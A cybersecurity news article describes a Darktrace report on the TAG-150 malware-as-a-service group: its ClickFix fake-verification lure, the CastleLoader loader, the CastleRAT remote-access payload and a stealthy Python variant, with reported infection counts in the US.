New MaaS Operator TAG-150 Uses ClickFix Lure and Custom CastleLoader to Compromise 469 US Devices

A new and aggressive player has entered the cybercrime arena. A recent report from Darktrace sheds light on TAG-150, a Malware-as-a-Service (MaaS) operator that has rapidly escalated its activities since emerging in early 2025. By combining sophisticated social engineering with modular custom malware, the group has successfully compromised hundreds of devices across the United States in just a few short months.

First observed in March 2025, TAG-150 has wasted no time establishing a formidable infrastructure. According to the report, the group is “demonstrating rapid development and an expansive, evolving infrastructure designed to support its malicious operations.”

The scale of their early success is alarming. “As of May 2025, CastleLoader alone had infected a reported 469 devices, underscoring the scale and sophistication of TAG-150’s campaign“. This rapid proliferation is driven by a primary focus on targets within the United States, utilizing a two-pronged malware approach.

TAG-150’s entry vector relies less on technical exploits and more on manipulating human behavior through a technique called ClickFix. This method involves directing users to deceptive domains that perfectly mimic legitimate software interfaces, such as Google Meet or browser update notifications.

Instead of asking the user to download a file, the site claims the user is missing a “verification step” or update. “When a user clicks on a spoofed Cloudflare ‘Verification Step’ prompt… The server’s response is then automatically copied to the user’s clipboard using the ‘unsecured CopyToClipboard()’ function”. The user is then tricked into pasting this content—a malicious PowerShell command—into their terminal, effectively hacking themselves.

Once the victim executes the command, TAG-150 deploys its custom toolkit. The attack begins with CastleLoader, a sophisticated loader that uses “dead-code insertion and packing to hinder both static and dynamic analysis.”

“TAG-150 leverages CastleLoader as its initial delivery mechanism, with CastleRAT acting as the main payload.” This modular separation allows the attackers to keep their most valuable tools hidden until the initial infection is secured.

The final payload, CastleRAT, grants the attackers total control. “Once deployed, CastleRAT grants attackers extensive control over the compromised system, enabling capabilities such as keylogging, screen capturing, and remote shell access.”

The report also highlights a particularly stealthy Python-based variant of their RAT, dubbed PyNightShade. This variant is “engineered with stealth in mind, showing minimal detection across antivirus platforms.” It notably communicates with the legitimate geolocation service ip-api[.]com to profile the victim’s location before fully engaging, ensuring they are striking their intended targets.

Related Posts:

• From CastleLoader to CastleRAT: TAG-150’s Multi-Tiered Cyber Arsenal Expands
• Darktrace Exposes “Fake Startup” Malware Campaign: Lures Crypto Users with AI/Web3 Apps to Steal Wallets
• DragonForce Ransomware Strikes Manufacturing Sector with Brute-Force, Exfiltrating Data Over SSH to Russian Host
• SocGholish Reloaded: Darktrace Uncovers Ransomware-Primed Loader Campaign
• ClickFix Phishing: New Automated Kits Trick Users Into Manually Running Malware and Stealers